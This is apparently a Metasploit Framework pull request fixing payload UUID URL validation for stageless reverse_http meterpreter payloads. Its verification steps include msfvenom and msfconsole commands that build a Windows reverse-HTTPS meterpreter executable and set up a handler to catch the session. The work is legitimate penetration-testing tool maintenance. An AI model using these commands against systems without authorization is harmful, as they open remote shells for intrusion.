### PR TITLE
Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -337,7 +337,7 @@ protected
       # Validate known URLs for all session init requests if IgnoreUnknownPayloads is set
       if datastore['IgnoreUnknownPayloads'] && info[:mode].to_s =~ /^init_/
         allowed_urls = db_uuid ? db_uuid['urls'] : []
-        unless allowed_urls.include?(req.relative_resource)
+        unless allowed_urls && allowed_urls.include?(req.relative_resource.chomp('/'))
           print_status("Ignoring unknown UUID URL: #{request_summary}")
           info[:mode] = :unknown_uuid_url
         end

--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -75,8 +75,7 @@ module Msf::Payload::TransportConfig
     uri = opts[:uri]
     unless uri
       type = opts[:stageless] == true ? :init_connect : :connect
-      sum = uri_checksum_lookup(type)
-      uri = luri + generate_uri_uuid(sum, opts[:uuid])
+      uri = luri + generate_uri_uuid_mode(type, uuid: opts[:uuid])
     end
 
     ds = opts[:datastore] || datastore

--- a/modules/payloads/singles/android/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_http.rb
@@ -37,8 +37,6 @@ module MetasploitModule
   end
 
   def generate_jar(opts={})
-    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
-    opts[:uri] = generate_uri_uuid_mode(:connect, uri_req_len)
     opts[:stageless] = true
     super(opts)
   end

--- a/modules/payloads/singles/android/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_https.rb
@@ -37,8 +37,6 @@ module MetasploitModule
   end
 
   def generate_jar(opts={})
-    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
-    opts[:uri] = generate_uri_uuid_mode(:connect, uri_req_len)
     opts[:stageless] = true
     super(opts)
   end


### PR DESCRIPTION
This fixes:
https://github.com/rapid7/metasploit-framework/issues/15480

Firstly when a stageless reverse_http payload is generated with msfvenom, the payload UUID URL is never stored into the db.
This change fixes this, and also ensures it's validated correctly when it connects.

## Verification

This is from: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode
but omitting the SSL verification.

- [x] `./msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.13.37 LPORT=4443 PayloadUUIDTracking=true PayloadUUIDName=ParanoidStagedStageless -f exe -o launch-paranoid-stageless.exe`
- [x] ` ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter_reverse_https; set LHOST 192.168.13.37; set LPORT 4443; set IgnoreUnknownPayloads true; run -j'`
- [x] **Verify** you get a session

You can also use the steps in 
https://github.com/rapid7/metasploit-framework/issues/15480

